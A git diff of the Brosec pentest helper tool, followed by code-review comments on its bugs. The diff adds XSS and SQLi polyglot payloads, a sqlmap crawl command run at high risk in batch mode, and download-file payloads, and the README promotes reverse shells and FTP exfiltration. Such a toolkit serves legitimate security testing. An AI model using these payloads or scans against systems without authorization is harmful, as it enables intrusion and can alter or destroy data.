diff --git a/.gitignore b/.gitignore index 105265f..9c243fb 100644 --- a/.gitignore +++ b/.gitignore @@ -26,4 +26,3 @@ build/Release # https://www.npmjs.org/doc/misc/npm-faq.html#should-i-check-my-node_modules-folder-into-git node_modules bros.db -settings.js diff --git a/CHANGELOG.md b/CHANGELOG.md index 7fca998..f810acf 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,13 +1,31 @@ # ChangeLog -## 0.2b _(Feb 16, 2016)_ +## Major Release 1.1.1 _(July 30, 2016)_ + +- Features + - Full Windows Support added + - Better documentation added to the new [wiki](https://github.com/gabemarshall/Brosec/wiki) + - Simplified install process. Once you have nodejs installed just run ```npm install -g Brosec``` + - ```bros encode``` module added (realtime encoder/decoder) + - ```bros ftp``` now supports auth via ```--username``` and ```--password``` parameters. + - New SQLi Polyglots added to ```bros 43``` + - New XSS payloads ```bros 42``` + - (```bros 424``` Credit to [@0xsobky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)) +- Dependencies + - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) -- this greatly reduces the complexity of Brosec and makes it easier to install. + + +- Bug fixes + - Lots and lots of bug fixes...and probably new bugs introduced ;p + +## 1.0.2b _(Feb 16, 2016)_ - Features - `bros update` - Convenience module that check for updates via git, pull if any updates are found, and installs any new dependencies. -## 0.2a _(Feb 15, 2016)_ +## 1.0.2a _(Feb 15, 2016)_ - Features - `bros clean` @@ -15,7 +33,7 @@ - Minor performance improvements throughout Brosec -## 0.2 _(Feb 5, 2016)_ +## 1.0.2 _(Feb 5, 2016)_ - Features - `bros ftp` diff --git a/README.md b/README.md index ea58de7..a92a529 100644 --- a/README.md +++ b/README.md 
@@ -6,95 +6,69 @@ Overview (tl;dr) Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard. -Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as... +Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as... [![asciicast](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg.png)](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg) -#### Payload Variables +Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so. -Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input. +[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) -For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set). 
-[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) +##### Additional Features and Usage Examples -##### Available variables -- LHOST : Local IP or name -- LPORT : Local IP or name -- RHOST : Remote IP or name -- RPORT : Remote IP or name -- USER : Username (only used in a few payloads) -- PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.) +###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http) +Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. + +![](http://i.imgur.com/47BHim4.gif)
+###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp) +Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). -![](http://i.imgur.com/FCateZJ.gif) -
Above are multiple examples of how to access and set the stored configuration variables. -- Configuration variables can be viewed via the `config` command at any time, or by entering the variable name -- Variables can be changed at any time by entering `set ` -- You can also navigate to frequently used payloads by entering the menu sequence from the command line: `bros ` - - Ex: `bros 413` - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload -
+###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode) -
-##### Additional Features and Usage Examples -###### XXE for Bros -![](http://i.imgur.com/hxrqlvk.gif) -
-In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly. -

+A realtime encoder/decoder utility designed with web pentesters in mind that often find the need to encode and decode various payloads. + +![](http://i.imgur.com/wxFpA7o.png) + + +Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki). -###### Simple HTTP(s) Server -Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. -![](http://i.imgur.com/47BHim4.gif) -
-###### Anonymous FTP Server -Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). Installation ============ ### [Releases](https://github.com/gabemarshall/Brosec/releases) -*Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec* -### Manual installation +### Mac + +#### Quick Installation -#### Mac +- `brew install node` - Install Nodejs (or download installer from https://nodejs.org/en/download/) +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin) -- `brew install node netcat` - Install Nodejs and netcat (nc or ncat will work too) -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies #### Kali Linux -- `apt-get install npm build-essential g++ xsel netcat` Install dependencies -- `npm config set registry http://registry.npmjs.org/` Npm registry seems to be broken by default when installed from Kali repos +- `apt-get install npm build-essential g++ xsel` Install dependencies - `npm install -g n` Install n (nodejs version manager) -- `n latest` Install latest version of nodejs -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies - -### Windows (Unsupported) + - If the above fails, try - `npm config set registry http://registry.npmjs.org/` -- Install [nodejs](https://nodejs.org/download) -- Install [ncat](https://nmap.org/download.html) -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - -Payloads that utilize netcat will not work due to the kexec library not being supported in Windows +- `n latest` Install latest version of nodejs +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink 
to /usr/local/bin) -#### Optional -Add bros directory path to your PATH env variable, create a symlink for the bros file, etc +### Windows (Unsupported) -Configuration -===================== +- Install via official installer [nodejs](https://nodejs.org/download) +- `npm install -g Brosec` - Install Brosec -Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc). Swag @@ -114,5 +88,6 @@ Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In additi - [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html) +- [SecLists](https://github.com/danielmiessler/SecLists) Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor) diff --git a/bros b/bros index 644de67..1f78909 100755 --- a/bros +++ b/bros @@ -3,13 +3,14 @@ var argv = require('yargs').argv, log = require('cli-color'), db = require('./db/db'), + os = require('os'), menu = require('./modules/menu'), secondaryMenu = require("./modules/secondaryMenu"), check = require('./modules/inputChecks'), simpleWeb = require('./modules/webserver/simple.js'), simpleFtp = require('./modules/webserver/simpleFtp.js'), interfaces = require('./modules/interfaces'), - settings = require('./settings'), + settings = require('./modules/settings'), child_process = require('child_process'), utilities = require('./modules/utilities'), log = require('./modules/log.js'); 
@@ -18,11 +19,6 @@ var firstArgument = argv._[0]; var secondArgument = argv._[1]; var thirdArgument = argv._[2]; - - - - - function getFirstArgValue(arg) { switch (arg) { case 1: @@ -42,7 +38,7 @@ function getFirstArgValue(arg) { } function parseArgs() { - + var oldSecondary; if (firstArgument >= 1 && firstArgument <= 6) { secondaryMenu = getFirstArgValue(firstArgument); @@ -75,6 +71,7 @@ function parseArgs() { } else if (typeof(firstArgument) === "string") { firstArgument = firstArgument.toUpperCase(); try { + oldSecondary = secondArgument; secondArgument = secondArgument.toUpperCase(); } catch(err){ @@ -92,6 +89,13 @@ function parseArgs() { //simpleFtp.ftps(argv); } else if (firstArgument === "UPDATE"){ utilities.update(); + } else if (firstArgument === "ENCODE"){ + if (secondArgument){ + utilities.encoder(oldSecondary); + } else { + utilities.encoder(); + } + } else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){ interfaces.setlhost(); @@ -101,10 +105,20 @@ function parseArgs() { } else if (firstArgument === "HELP") { check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu); } else if (firstArgument === "CLEAN") { - child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ + + var currentOS = os.type(); + var cmd = "rm"; + var dir = settings.dbPath; + if (currentOS.match("Windows")){ + cmd = "del"; + } else { + + } + + child_process.execFile(cmd, [dir], function(error, stdout, stderr){ }); console.log("The Brosec database located at %s has been wiped.", settings.dbPath) - } + } else { check.allInputChecks(firstArgument, console.log, console.log) } diff --git a/db/db.js b/db/db.js index 820b5ac..2aa0a85 100644 --- a/db/db.js +++ b/db/db.js 
@@ -1,10 +1,10 @@ var dirty = require('dirty'); -var settings = require('../settings.js') - +var settings = require('../modules/settings.js'); +var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js try { - var db = dirty(settings.dbPath); + var db = dirty(settings.dbPath); } catch (err){ console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.") @@ -19,7 +19,7 @@ exports.new = function(title, description){ } exports.newConfig = function(key, val){ - var keyExists = false + var keyExists = false db.forEach(function(keyStore, valStore) { if (key === keyStore){ keyExists = true @@ -33,7 +33,7 @@ exports.newConfig = function(key, val){ } else { db.set(key, val) - } + } db.on('drain', function() { }); } @@ -52,11 +52,10 @@ function getConfig(value){ } // If none exist else { - + } }); return test } exports.getConfig = getConfig; - diff --git a/modules/checkModule.js b/modules/checkModule.js deleted file mode 100644 index 7ddf620..0000000 --- a/modules/checkModule.js +++ /dev/null @@ -1,8 +0,0 @@ -exports.kexec = function(){ - try { - var kexec = require('kexec'); - return true - } catch (err){ - return false; - } -} diff --git a/modules/colorize.js b/modules/colorize.js index 0079c24..ce0193d 100644 --- a/modules/colorize.js +++ b/modules/colorize.js @@ -2,7 +2,7 @@ var log = require('cli-color'); exports.samples = function(sample){ - var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/) + var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/gi) var doesSampleContainRemote = sample.match(/((<(RHOST)\s*?.*?>))/) var doesSampleContainRemotePort = sample.match(/((<(RPORT)\s*?.*?>))/) var doesSampleContainLocal = sample.match(/((<(LHOST)\s*?.*?>))/) 
@@ -10,14 +10,31 @@ exports.samples = function(sample){ var doesSampleContainUser = sample.match(/((<(USER)\s*?.*?>))/) var doesSampleContainPath = sample.match(/((<(PATH)\s*?.*?>))/) - function addSomeColor(val, color){ - var temp = sample.split(val[0]) - var final = temp[0]+color(val[0])+temp[1] + function replaceAll(str, find, replace) { + return str.replace(new RegExp(find, 'g'), replace); + } + + function addSomeColor(val, color, debug){ + + if (val.length > 1){ + for (b=0;b))/gi, userResponse) - //payload = payload.replace(/(\\)/gi,"@@") + var t = JSON.parse(userResponse) + if (t.length > 1){ + for (i=0;i))/i, t["+i+"])"); + } + } else { + payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, t[0]); + } + } else { tmenu() return @@ -70,7 +58,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call payload = payload.replace(/((<(USER)\s*?.*?>))/gi, user) payload = payload.replace(/((<(PATH)\s*?.*?>))/gi, path) - payload = payload.replace(/(')/gi, "\\'") if(payload.match(/undefined/)){ warn() return false; diff --git a/modules/questionUser.js b/modules/questionUser.js index 6b5c145..7d1fa9e 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -2,15 +2,11 @@ var prompt = require('prompt'), os = require('os'), log = require('cli-color'), web = require("./webserver/webserver.js"), - settings = require('../settings.js'), + settings = require('./settings.js'), db = require('../db/db'), currentOS = os.type(), - checkModule = require('./checkModule.js'), - finalAnswer - -if (checkModule.kexec()) { - var kexec = require('kexec'); -} + netcat = require('./nc'), + finalAnswer = []; exports.http = function(callback) { prompt.message = "Should I fire up a web server for you? (Y/n) :" 
@@ -36,8 +32,12 @@ exports.http = function(callback) { exports.ncat = function(callback) { var port = db.getConfig("LPORT") - if (kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" @@ -46,9 +46,9 @@ exports.ncat = function(callback) { try { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - console.log(log.blackBright("\n[*] Initializing hacking sequence (" + settings.netcat + " -lnp " + port + " -vv)")); callback(finalAnswer); - kexec(settings.netcat + " -lnp " + port + " -vv"); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port)); + netcat.listen(port); } else { callback(finalAnswer); } @@ -57,20 +57,20 @@ exports.ncat = function(callback) { } }) - } else { - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " -vv")); - callback(finalAnswer); - } + } exports.ncatReceiveFile = function(callback) { var port = db.getConfig("LPORT"); - var path = db.getConfig("PATH"); + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } + var path = process.cwd()+"/"; var localFile = finalAnswer.replace(/(\/)/g, "_") - if (!kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" 
@@ -80,17 +80,10 @@ exports.ncatReceiveFile = function(callback) { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - - if (!path || path.length <= 0) { - log.yellow("Warning: Path variable is not set, defaulting to /var/tmp/") - } - path = "/var/tmp/" - - // if kexec isn't installed, notify the user callback(finalAnswer); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port + " (File will be saved as "+path+localFile+")\n")); - console.log(log.blackBright("\n[*] Initializing hacking sequence (File will be saved as " + path + "/bros" + localFile + ")\n")) - kexec(settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile + " -vv"); + netcat.receiveFile(port, path, localFile); } else { callback(finalAnswer); @@ -100,11 +93,6 @@ exports.ncatReceiveFile = function(callback) { } }) - } else { - callback(finalAnswer); - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile)); - } } exports.some = function(question, callback, type) { @@ -125,7 +113,7 @@ exports.some = function(question, callback, type) { if (err) { console.log(err); } else { - finalAnswer = result._; + finalAnswer.push(result._); temp += 1; } @@ -150,6 +138,7 @@ exports.some = function(question, callback, type) { clearInterval(checkStatus); // If the last question is a string, send output to final parsing if (typeof(question[temp - 1]) === "string") { + finalAnswer = JSON.stringify(finalAnswer); callback(finalAnswer); } } diff --git a/modules/secondaryMenu.js b/modules/secondaryMenu.js index 721d252..1f6702d 100644 --- a/modules/secondaryMenu.js +++ b/modules/secondaryMenu.js 
@@ -175,7 +175,7 @@ var Menu = function(title, menuOptions, payloadType) { var menus = {} var infoGMenu = new Menu("--[ Information Gathering ]--", ["DNS", "Port Scanning", "SMB", "SNMP"], pay.infog); -var webMenu = new Menu("--[ Web ]--",["XML", "SQLi"], pay.web) +var webMenu = new Menu("--[ Web ]--",["XML", "XSS", "SQLi"], pay.web) var miscMenu = new Menu('--[ Miscellaneous ]--', ["Reverse Shells", "Exfiltration"], pay.misc) var linuxMenu = new Menu('--[ Linux ]--', ["System Info", "File System", "Networking", "Stealth", "Privesc"], pay.linux) var windowsMenu = new Menu('--[ Windows ]--', ["System Info", "File System", "Networking", "WMIC", "Powershell", "Windows Registry"], pay.windows) diff --git a/modules/settings.js b/modules/settings.js new file mode 100644 index 0000000..cc78dd6 --- /dev/null +++ b/modules/settings.js @@ -0,0 +1,17 @@ +var settings = {}, + os = require('os'); + +// ---[Db Storage Path]--- +// Brosec stores variable values using the nodejs dirty module + +var currentOS = os.type(); + +if (currentOS.match("Windows")){ + settings.dbPath = dirty(os.tmpdir()+"\\bros.db"); +} else { + settings.dbPath = '/var/tmp/bros.db' +} + + + +module.exports = settings; diff --git a/modules/utilities.js b/modules/utilities.js index 6d4f81f..b951072 100644 --- a/modules/utilities.js +++ b/modules/utilities.js @@ -1,5 +1,6 @@ var child_process = require('child_process'), log = require('./log.js'), + encoder = require('./encoder'), brosDir = require.resolve('cli-color'); // Get install path @@ -24,3 +25,7 @@ exports.update = function(){ }) } + +exports.encoder = function(input){ + encoder.init(input); +} \ No newline at end of file diff --git a/modules/webserver/simpleFtp.js b/modules/webserver/simpleFtp.js index 68948ac..5a0396a 100644 --- a/modules/webserver/simpleFtp.js +++ b/modules/webserver/simpleFtp.js 
@@ -2,16 +2,19 @@ var ftpd = require('ftpd'); var fs = require('fs'); var path = require('path'); var log = require('../log.js'); -var keyFile; -var certFile; -var server; +var argv = require('yargs').argv; +var userArg = argv.username; +var passArg = argv.password; +var keyFile, certFile, server; var options = { host: process.env.IP || '127.0.0.1', port: process.env.PORT || 7002, tls: null, }; + var startFtpServer = function(protocol){ + console.log(" [!] WARNING: This ftp server is not intended to be secure and should be used with caution.\n") if (protocol === "ftps"){ console.log("ftps") options.tls = { @@ -44,33 +47,46 @@ var startFtpServer = function(protocol){ var username = null; console.log('client connected: ' + connection.remoteAddress); connection.on('command:user', function(user, success, failure) { - if (user) { - username = user; - success(); - } else { - failure(); - } + if (user) { + username = user; + success(); + } else { + failure(); + } }); connection.on('command:pass', function(pass, success, failure) { - if (pass) { - success(username); + if(!passArg){ + if (pass) { + success(username); + } else { + failure(); + } } else { - failure(); + if (pass === passArg){ + success(username); + } else { + failure(); + } } }); }); server.debugging = 4; - + ftpPort = options.port if (!ftpPort){ ftpPort = 2121; } - + server.listen(ftpPort); - console.log(" [*] An "+log.status("anonymous")+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + var ftpType = " anonymous "; + if (userArg){ + ftpType = ""; + } + console.log(" [*] An"+log.status(ftpType)+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + } diff --git a/package.json b/package.json index fae406f..4ab82b7 100644 --- a/package.json +++ b/package.json 
@@ -1,8 +1,8 @@ { "name": "Brosec", - "version": "0.0.1a", + "version": "1.1.1", "description": "Brosec - Pentest fu for bros", - "main": "bros.js", + "main": "bros", "repository": { "type": "git", "url": "git://github.com/gabemarshall/Brosec.git" @@ -10,13 +10,15 @@ "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, + "bin": { + "bros": "./bros" + }, "dependencies": { "cli-color": "*", "cli-table": "*", "dirty": "*", "ejs": "^2.3.1", "express": "*", - "kexec": "^2.0.2", "morgan": "*", "mstring": "*", "prompt": "*", @@ -25,10 +27,10 @@ "method-override": "*", "ecstatic": "*", "simple-git": "*", - "ftpd": "*" - }, - "optionalDependencies":{ - "kexec":"^2.0.2" + "ftpd": "*", + "blessed": "*", + "js-htmlencode": "*", + "copy-paste":"*" }, "author": "Gabe Marshall", "license": "ISC" diff --git a/payloads/misc.js b/payloads/misc.js index 174dcf1..84c66d5 100644 --- a/payloads/misc.js +++ b/payloads/misc.js @@ -112,10 +112,11 @@ Load({ Load({ title: "Download File via Python", - payload:'python -c \'import urllib;urllib.urlretrieve ("http://:/","");\'', + payload:'python -c \'import urllib;urllib.urlretrieve ("","");\'', category: "Exfiltration", callback: function(bro){ - question("What file would you like to download? (ex: script.sh)"); + question("What would you like to download? (ex: http://foo.bar/script.sh)"); + question("Where would you like to save it? (ex: /tmp/script.sh)"); ask.some(questions, bro); } }) diff --git a/payloads/web.js b/payloads/web.js index 8e06499..898333a 100644 --- a/payloads/web.js +++ b/payloads/web.js 
@@ -97,30 +97,62 @@ Load({ category: "XML" }) +// ####### XSS ########## + +Load({ payload: "'';!--\"=&{()}", title: "Test string to see how data is being filtered/escaped.", category: "XSS"}) +Load({ payload: "-->\">'>", title: "XSS Polyglot injecting into HTML", category: "XSS"}) +Load({ payload: "';alert(1)//\';alert(2)//\";alert(3)//\\\";alert(4)//-->\">'>=&{}", title: "XSS Polyglot injecting into JS", category: "XSS"}) + +// Credit to https://twitter.com/0xsobky +Load({ payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e", title: "XSS polyglot locator", category: "XSS"}) + + // ####### sqlmap ######### +Load({ payload: "SLEEP() /*' or SLEEP() or '\" or SLEEP() or \"*/", title: "SQLi Polyglot", category: "SQLi", +callback: function(bro){ + question("How many seconds would you like to sleep for?"); + ask.some(questions, bro); +}}) + +// Credit to Detectify https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/ +Load({ payload: "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\"*/", title: "SQLi (MySQL) Polyglot", category: "SQLi"}) + + +Load({ + title: "Use sqlmap to crawl and scan for SQLi", + payload: "sqlmap -u '' --forms --batch --crawl=10 --level=5 --risk=3 --cookie=''", + category: "SQLi", + callback: function(bro){ + question("What URL would you like to scan?"); + question("What cookies would you like to include?"); + ask.some(questions, bro); + } +}) + Load({ title: "Use sqlmap to directly connect to an Oracle db (requires Oracle instant client)", - payload: "sqlmap -d 'oracle://@:/'", + payload: "sqlmap -d 'oracle://@:/'", category: "SQLi", callback: function(bro){ question("What DB credentials would you like to use? (Enter as username:password)"); + question("Whats the SID of the DB? 
(ex: testdb)"); ask.some(questions, bro); } }) Load({ title: "Use sqlmap to directly connect to a MySQL db", - payload: "sqlmap -d 'mysql://@:/'", + payload: "sqlmap -d 'mysql://@:/'", category: "SQLi", callback: function(bro){ question("What DB credentials would you like to use? (Enter as username:password)"); + question("Whats the name of the DB? (ex: testdb)"); ask.some(questions, bro); } }) -// sqlmap -d "mysql://:@:/" /* ###################################################### diff --git a/payloads/windows.js b/payloads/windows.js index 512499b..0d82c37 100644 --- a/payloads/windows.js +++ b/payloads/windows.js @@ -157,10 +157,11 @@ Load({ Load({ title: "Download File", - payload: '(new-object system.net.webclient).downloadFile("","")', + payload: '(new-object system.net.webclient).downloadFile("","")', category: "Powershell", callback: function(bro){ question("What is the full URI path of the hosted file? (ex: http://foo.bar/bro.zip)") + question("Where would you like to save it? (ex: C:\\TEMP\\bro.zip)"); ask.some(questions, bro); } diff --git a/settings.js b/settings.js deleted file mode 100644 index d38c3d7..0000000 --- a/settings.js +++ /dev/null @@ -1,16 +0,0 @@ -var settings = {} - -// ---[Db Storage Path]--- -// Brosec stores variable values using the nodejs dirty module - -settings.dbPath = '/var/tmp/bros.db' - -// ---[netcat]--- -// (ex: ncat, netcat, nc.traditional) - -settings.netcat = "netcat" - - - - -module.exports = settings;
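Review bot: The CHANGELOG hunk rewrites the already-published headings `## 0.2b`, `## 0.2a` and `## 0.2` to `1.0.2b`, `1.0.2a` and `1.0.2`; those are the numbers that were shipped (package.json sat at `0.0.1a` until this same commit), so renaming them after the fact breaks the link between the changelog and the tags on the Releases page. Keep the old headings as they were and add only the new `## Major Release 1.1.1` entry; if the numbering scheme is changing, say so in the 1.1.1 entry rather than editing history.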
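Review bot: README.md still heads its section `### Windows (Unsupported)` while the CHANGELOG in this same patch announces "Full Windows Support added"; one of the two is wrong, and given the `modules/settings.js` and `CLEAN` problems elsewhere in this diff the README heading is currently the accurate one. Two more points in the same hunk: the fallback `npm config set registry http://registry.npmjs.org/` points at the registry over plain HTTP, so every dependency (installed with `sudo`, per the adjacent line) can be swapped on the wire; use `https://registry.npmjs.org/`. And the Configuration paragraph that told users where the database lives and how to change `dbPath` was deleted without a replacement; either restore a one-line pointer to `modules/settings.js` or move that text to the wiki and link it.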
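Review bot: The `CLEAN` branch in `bros` will not work on Windows and mis-reports failures everywhere: `del` is a cmd.exe builtin, not an executable, so `child_process.execFile(cmd, [dir], ...)` with `cmd = "del"` fails with ENOENT; the callback discards `error`, and `console.log("The Brosec database located at %s has been wiped.", settings.dbPath)` runs unconditionally, so a missing or unremovable file is still reported as wiped. The `} else { }` block is also leftover. Replace the spawn with `fs.unlinkSync(settings.dbPath)` in a try/catch and print success only on the success path; that is cross-platform and removes the `os.type()` branch entirely.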
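Review bot: In the db/db.js hunk the require is updated to `../modules/settings.js`, but the comment `// Change storage location by altering settings.js` and the error text "Check the settings.js file to specify a valid storage location." still name the deleted top-level file; update both to `modules/settings.js`. The rest of the hunk is whitespace-only churn (trailing spaces), which is fine to drop but worth separating from functional changes next time.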
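Review bot: In the `prepare` hunk of the payloads module, the multi-answer branch builds the replacement as a source string, `"payload = payload.replace(/((<(PROMPT)\s*?.*?>))/i, t["+i+"])"`, which only makes sense if that string is then evaluated; a plain loop `for (var i = 0; i < t.length; i++) payload = payload.replace(/((<(PROMPT)\s*?.*?>))/i, t[i])` does the same job without executing generated code. The loop counters `i` here and `b` in modules/colorize.js are assigned without `var`, so they become implicit globals. `JSON.parse(userResponse)` will also throw if any caller still passes a raw string rather than the JSON array that `some()` now produces, so guard it or make every caller go through `some()`. Dropping `payload = payload.replace(/(')/gi, "\\'")` is correct now that payloads are no longer handed to a shell via kexec, but it changes what gets copied to the clipboard and deserves a CHANGELOG line.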
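Review bot: In modules/questionUser.js, changing `finalAnswer` from a string to a module-level array breaks `ncatReceiveFile`, which still does `var localFile = finalAnswer.replace(/(\/)/g, "_")`: an array has no `replace`, and once `some()` has run `finalAnswer = JSON.stringify(finalAnswer)` it is a JSON string, so the saved filename would carry the surrounding `["` and `"]`. That reassignment also means the array is never reset, so a second round of questions in the same process calls `.push` on a string. Keep the answers local to each `some()` call (initialise `[]` at the start, pass the array to the callback), derive the filename from the first answer, and use `path.join(process.cwd(), localFile)` instead of `process.cwd()+"/"` so the Windows path is correct. The `netcat = require('./nc')` and `encoder = require('./encoder')` modules that replace kexec are not in this patch as posted, so the listener and `bros encode` themselves cannot be reviewed here.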
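Review bot: The new modules/settings.js cannot load on Windows: the branch `settings.dbPath = dirty(os.tmpdir()+"\\bros.db");` calls `dirty`, which is never required in that file, so the require throws a ReferenceError before anything else runs. Even with the require added, `dbPath` would then be a dirty instance rather than a path string, while db/db.js immediately wraps it again in `dirty(settings.dbPath)` and `bros` passes it to `rm`/`del` as a filename. Drop the wrapper and build a plain string with `path.join(os.tmpdir(), 'bros.db')`, which also removes the hand-escaped backslash. Since the headline of this release is Windows support, this path should be exercised on a Windows box before tagging 1.1.1.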
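Review bot: `--username` in modules/webserver/simpleFtp.js is never enforced: `userArg` is read from argv but the `command:user` handler still accepts any non-empty `user`, and only `command:pass` compares `pass === passArg`, so with both flags set any username plus the right password logs in, and with only `--username` set the server is still anonymous while the banner merely drops the word "anonymous". Compare `user === userArg` in the user handler when `userArg` is set, and refuse to start (rather than silently fall back to anonymous) when one of `--username`/`--password` is given without the other. Two caveats to add next to the new "not intended to be secure" warning: the password arrives on the command line, so it is visible in `ps` and shell history, and plain `ftp` sends it in the clear unless the `ftps` path is used.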
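Review bot: Every dependency in package.json except `"ejs": "^2.3.1"` is `"*"`, and the new `blessed`, `js-htmlencode` and `copy-paste` entries follow suit, so `npm install -g Brosec` resolves whatever the newest published version of each package is at install time, typically under `sudo` as the README suggests. For a tool pentesters run as root on their own machines that is an unpinned supply chain with no reproducibility between two installs of "1.1.1". Pin to caret or exact ranges and commit an `npm shrinkwrap` file so the dependency tree is fixed at release time; the `"bin": { "bros": "./bros" }` entry itself is correct for the global install.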
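Review bot: The "Download File via Python" payload in payloads/misc.js uses `urllib.urlretrieve`, which exists only in Python 2; on Python 3 the call is `urllib.request.urlretrieve`, so the payload will fail with an AttributeError on a target where `python` is Python 3. Either mark the title as Python 2 or add a second entry for Python 3 so the user picks the right one for the target.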
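Review bot: The new "Use sqlmap to crawl and scan for SQLi" payload in payloads/web.js combines `--forms --batch --crawl=10 --level=5 --risk=3`. `--risk=3` enables OR-based boolean payloads, which sqlmap's own documentation warns can modify data when they land inside UPDATE or DELETE statements, and `--batch` suppresses the prompts that would otherwise let the tester back out; with `--crawl=10` and form submission those payloads are fired into every discoverable form on the site. Default to `--risk=2` (or prompt for the value alongside the URL and cookie) and state the data-modification risk in the title so a user who types `bros 43` knows what they are launching.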